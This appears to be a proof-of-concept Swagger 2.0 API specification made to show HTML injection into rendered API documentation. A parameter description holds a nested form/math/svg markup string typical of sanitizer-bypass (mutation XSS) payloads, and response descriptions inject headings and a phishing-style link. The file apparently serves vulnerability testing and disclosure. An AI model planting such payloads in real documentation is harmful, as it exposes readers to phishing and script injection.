swagger: '2.0'
info:
  title: HTML INJECTION FOR POC
  description: |
    hide

  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  "/cern-poc-example":
    get:
      responses:
        '200':
          description: No response was specified
      tags:
      - somettext
      operationId: findAccounts
      summary: this is example text
  "/cern-poc-example":
    delete:
      parameters:
      - description: |
          <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="<h1>hide here</h1>"></form>

        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: <h1>I am naughty cockatoo, look at this totally not evil site:</h1> <h1><a href="https://google.com">Click Here</a></h1>
      tags:
      - cern-poc-example
      operationId: cern-poc-example
      summary: cern-poc-example
    get:
      parameters:
      - description: this is example text
        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: <h1>I am naughty cockatoo, look at this totally not evil site:</h1> <h1><a href="https://google.com">Click Here</a></h1>
      tags:
      - cern-poc-example
      operationId: some_operation
      summary: this is example text
